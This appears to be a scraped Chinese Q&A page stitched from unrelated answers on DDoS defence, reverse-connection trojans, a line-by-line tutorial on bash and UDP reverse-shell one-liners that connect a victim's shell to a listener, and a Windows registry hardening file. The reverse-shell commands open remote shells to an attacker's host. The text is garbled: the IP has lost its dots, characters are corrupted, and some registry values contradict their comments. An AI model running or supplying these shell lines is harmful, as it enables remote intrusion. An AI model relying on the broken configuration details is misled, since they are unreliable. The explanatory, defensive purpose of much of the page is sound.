为什么服务器一直被ddos攻击怎么办？

普通攻击使用通用的防御方案，比如高防服务器或开源IP限速等应用插件就能解决。也可以使用一些免费的原生安全CDN。

然后对于低成本的应对方法，我给出几个建议。
挂cdn隐藏IP，在换成新的ip后，请务必挂cdn对真实的ip进行隐藏，这样无论怎样被攻击，cdn都可以为你进行抵御。
并且，cdn还可以不止套一层，可以多层一起嵌套，网络上免费的也不少。
准备多个服务器做反向代理（配置可以不高，能运行nginx就行，最好是那种空路由时间短的），每个反向代理服务器都指向主服务器节点，都绑定一个二级域名，都挂上不同的cdn。
主域名可以随时解析到任意一个反向代理服务器，并且可以挂免费的云监控来实时知晓状态，一个节点死了改解析就行。

在防火墙层面禁止所有的国外ip（这是大部分肉鸡主要来源），可以很好的降低攻击流量。
以上是比较简单，低成本的方法，如果钱多的话，建议购买高防IP，和高防cdn共同防御。
针对不同场景不同的环节也有针对性的防御方案，无法一概而论，当然也看您遇到的对手是什么样的级别。

你好，对于你的问题：
1、木马是个宽泛的概念，指的就是后门程序|
2、而反d木马是木马病毒的一种类型，这类木马与传统的远程控制软件相反，进行C/S（客户端/服务器）的反向连接。当木马服务端被种植到他人的机器中，服务端运行后，会动态分配一个端口，主动连接客户端（黑客）的80端口，如果你用“netstat -a”命令检查，将显示“TCP 本机IP:2513 远程IP：80 ESTABLISHED”类似的数据，好象是在浏览网页，因此防火墙也不会阻挡这种非法连接，给木马的防范带来了困难。
有其他问题欢迎到电脑管家企业平台咨询，我们将竭诚为您服务！

腾讯电脑管家企业平台：>

1如果是云服务器，可买ddos防御服务，价钱很贵。

2如果是idc机房，一般机房都提供硬防。

3购买CDN服务放在前面。

4在自己的服务器端也可以做一些配置，比如在nginx服务器上做基于ip的频次限限制,也能起到一些作用。

将这句话拆开来看， bash -i ， >& ， /dev/tcp/ ， 0>&1 ，有三个知识点。
（1） bash -i 是打开一个交互的bash
（2） /dev/tcp/ 是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用，建立一个socket连接，读写这个文件就相当于在这个socket连接中传输数据。同理，Linux中还存在/dev/udp/。
（3） >& 和 0>&1 这两个涉及到Linux文件描述符和重定向。此处的 & 是取地址符

（1）文件描述符
Linux启动时会默认打开三个文件描述符（实现文件读写 *** 作），Linux把键盘、显示器等设备也当做文件用文件描述符进行控制，如果要修改默认设备就需要进行重定向。

（2）重定向
输入的重定向包括， < 和 << ，输出的重定向包括， > 和 >> ， n< file 代表将文件描述符 n 重定向到file指代的文件（以只读方式打开）,如果n省略就是0（标准输入）。同理如果是输出的重定向， n> file ，n省略则默认是1。

错误输出的重定向有三种形式

其中， &> 和 >& 是一个意思，都是将标准错误输出合并到标准输出中。 2>&1 和 >file 可以用如下过程图表示

需要注意的是，上述输入输出重定向，将输入和输出绑定到文件或者设备只对该条指令有效，如果想要一直有效，就需要添加exec指令 exec n </> file/n

（3）复制
与之形似的是文件描述符的复制 n<&m / n>&m ，这两个都是将文件描述符 n 复制到 m ，两者的区别是，前者是以只读的形式打开，后者是以写的形式打开，因为读/写方式对于复制 *** 作几乎没有影响所以两者基本可以看作是等价的。这里的 & 目的是区分以数字为名字的文件和文件描述符的数值，如果没有 & 系统会认为是将文件描述符重定向到了一个数字作为文件名的文件，而不是另一个文件描述符。

此时再来看这句命令，可与理解为，创建一个可交互的bash和一个到17216811:80的TCP链接，然后将bash的输入输出错误都重定向到在17216811:80监听的进程。

首先，反dshell可以理解为，攻击者监听在TCP/UDP端口，被控制端的请求被转发到该端口，可以控制其输入输出。一般攻击者攻击了一台机器，并用自己的主机去连接该机器的端口，这是一种“正向连接”，远程桌面、web服务、ssh、telnet等都是正向连接的一种。但是如果被攻击的机器处于内网中可能造成无法连接，或者有防火墙等限制，再或者攻击者需要进行实时控制，正向连接是无法满足需要的。所以有了“反向连接”，即让被攻击的主机主动去连接攻击者的服务器。

所以我们还可以从反向连接的角度来理解一下 0>&1 。如果只是 bash -i >& /dev/tcp/17216811/80 ，将输出描述符连接到了端口，该端口可接收到我们的输出，即我们正向连接了被攻击者的机器，但是我们输入shell后是无法看到回显的。回显只会显示在被攻击者的机器上。如果我们想要得到回显，需要将被攻击机器的输入描述符连接到我们监听的端口上。

也就是说如果我们想要看到回显，除了先将输出描述符连接到端口上，还需要将其输入描述符也连接到端口上。即输入描述符0和输出描述符1连接相同， 0>&1 即可解决。这就形成了一个回路，实现了远程交互式shell的功能。

不过这样的一条指令还不够完善，因为这条指令会使得我们在被攻击的机器上依然能看到我们在攻击者机器中执行的指令，那么解决办法就是将错误输出和标准输出进行混合，即将 bash -i > 换为 bash -i >&

Bash相关shell主要有以下几种：

刚才详细讲的是第一种bash shell，第二种是将 >& 这种错误输出的混合方式改成了 2>&1 ，2代表错误输出，1代表标准输出，2指向了1，即输出混合了。文件描述符的复制 n<&m / n>&m 两种虽然读写不同但是对于shell的效果是等价的，即和 0>&1 效果相同。所以第二种就是第一种的变种。第四种同理，输入、输出、报错都定位到同一位置。第五种选了一个新的文件描述符196，道理类似。

对于第三种bash shell，exec已经在前面提到过可以持续连接，后面的关键点如下：

从文件中依次读取每一行，将其赋值给 line 变量（其他也可），之后在循环中对line进行 *** 作。这里不再从文件中读取，而是通过管道符对攻击者机器上输入的命令进行依次执行，并且将标准输出和标准错误输出都重定向到了文件描述符5，也就是攻击机上，实现交互式shell的功能。

另外，本文最开始的时候说到/dev/tcp/是Linux中的一个特殊设备类似的还有/dev/udp/，按照tcp的方式直接改成udp就行。
sh -i >& /dev/udp/17216811/80 0>&1

除了bash还有很多其他借用第三方工具（nc、telnet、socat、xterm）或使用脚本语言（python、Perl、Ruby、Go、PHP、Lua、JAVA、gawk、Powershell）反dshell的方式，这里就不一一列举了，原理类似。写这篇文章总结shell的过程中顺手将网络上的shell进行了收集，将近80条，写了BashShellpy，就是个简单的查询shell的工具，有需要的下方留言

DDOS攻击的目的有两个：一个是消耗网络带宽资源，二是消耗服务器系统资源。
因此在遇到DDOS攻击的典型现象就是，带宽资源被耗尽，或者服务器系统资源被占满。
在遇到DDOS攻击，用户需要判断攻击的方式，进而采取相应的措施。
但是，此时实际上已经给用户造成了影响了，因此建议用户使用专业的抗DDOS攻击，提前预防。
修改注册表防范DDos攻击：
Windows Registry Editor Version 500
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
'关闭无效网关的检查。当服务器设置了多个网关，这样在网络不通畅的时候系统会尝试连接
'第二个网关，通过关闭它可以优化网络。
"EnableDeadGWDetect"=dword:00000000
'禁止响应ICMP重定向报文。此类报文有可能用以攻击，所以系统应该拒绝接受ICMP重定向报文。
"EnableICMPRedirects"=dword:00000000
'不允许释放NETBIOS名。当攻击者发出查询服务器NETBIOS名的请求时，可以使服务器禁止响应。
'注意系统必须安装SP2以上
"NoNameReleaseOnDemand"=dword:00000001
'发送验证保持活动数据包。该选项决定TCP间隔多少时间来确定当前连接还处于连接状态，
'不设该值，则系统每隔2小时对TCP是否有闲置连接进行检查，这里设置时间为5分钟。
"KeepAliveTime"=dword:000493e0
'禁止进行最大包长度路径检测。该项值为1时，将自动检测出可以传输的数据包的大小，
'可以用来提高传输效率，如出现故障或安全起见，设项值为0，表示使用固定MTU值576bytes。
"EnablePMTUDiscovery"=dword:00000000
'启动syn攻击保护。缺省项值为0，表示不开启攻击保护，项值为1和2表示启动syn攻击保护，设成2之后
'安全级别更高，对何种状况下认为是攻击，则需要根据下面的TcpMaxHalfOpen和TcpMaxHalfOpenRetried值
'设定的条件来触发启动了。这里需要注意的是，NT40必须设为1，设为2后在某种特殊数据包下会导致系统重启。
"SynAttackProtect"=dword:00000002
'同时允许打开的半连接数量。所谓半连接，表示未完整建立的TCP会话，用netstat命令可以看到呈SYN_RCVD状态
'的就是。这里使用微软建议值，服务器设为100，高级服务器设为500。建议可以设稍微小一点。
"TcpMaxHalfOpen"=dword:00000064
'判断是否存在攻击的触发点。这里使用微软建议值，服务器为80，高级服务器为400。
"TcpMaxHalfOpenRetried"=dword:00000050
'设置等待SYN-ACK时间。缺省项值为3，缺省这一过程消耗时间45秒。项值为2，消耗时间为21秒。
'项值为1，消耗时间为9秒。最低可以设为0，表示不等待，消耗时间为3秒。这个值可以根据遭受攻击规模修改。
'微软站点安全推荐为2。
"TcpMaxConnectResponseRetransmissions"=dword:00000001
'设置TCP重传单个数据段的次数。缺省项值为5，缺省这一过程消耗时间240秒。微软站点安全推荐为3。
"TcpMaxDataRetransmissions"=dword:00000003
'设置syn攻击保护的临界点。当可用的backlog变为0时，此参数用于控制syn攻击保护的开启，微软站点安全推荐为5。
"TCPMaxPortsExhausted"=dword:00000005
'禁止IP源路由。缺省项值为1，表示不转发源路由包，项值设为0，表示全部转发，设置为2，表示丢弃所有接受的
'源路由包，微软站点安全推荐为2。
"DisableIPSourceRouting"=dword:0000002
'限制处于TIME_WAIT状态的最长时间。缺省为240秒，最低为30秒，最高为300秒。建议设为30秒。
"TcpTimedWaitDelay"=dword:0000001e
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]
'增大NetBT的连接块增加幅度。缺省为3，范围1-20，数值越大在连接越多时提升性能。每个连接块消耗87个字节。
"BacklogIncrement"=dword:00000003
'最大NetBT的连接快的数目。范围1-40000，这里设置为1000，数值越大在连接越多时允许更多连接。
"MaxConnBackLog"=dword:000003e8
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Afd\Parameters]
'配置激活动态Backlog。对于网络繁忙或者易遭受SYN攻击的系统，建议设置为1，表示允许动态Backlog。
"EnableDynamicBacklog"=dword:00000001
'配置最小动态Backlog。默认项值为0，表示动态Backlog分配的自由连接的最小数目。当自由连接数目
'低于此数目时，将自动的分配自由连接。默认值为0，对于网络繁忙或者易遭受SYN攻击的系统，建议设置为20。
"MinimumDynamicBacklog"=dword:00000014
'最大动态Backlog。表示定义最大"准"连接的数目，主要看内存大小，理论每32M内存最大可以
'增加5000个，这里设为20000。
"MaximumDynamicBacklog"=dword:00002e20
'每次增加的自由连接数据。默认项值为5，表示定义每次增加的自由连接数目。对于网络繁忙或者易遭受SYN攻击
'的系统，建议设置为10。
"DynamicBacklogGrowthDelta"=dword:0000000a
====================================================
以上存为reg后即可直接导入
当然可以在里面相应的添加其他设置进行一次性修改注册表如:
'关闭445端口
"SMBDeviceEnabled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\Parameters]
'禁止C$,D$一类的共享
"AutoShareServer"=dword:00000000
'禁止ADMIN$缺省共享
"AutoShareWks"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
'限制IPC$缺省共享
"restrictanonymous"=dword:00000000

---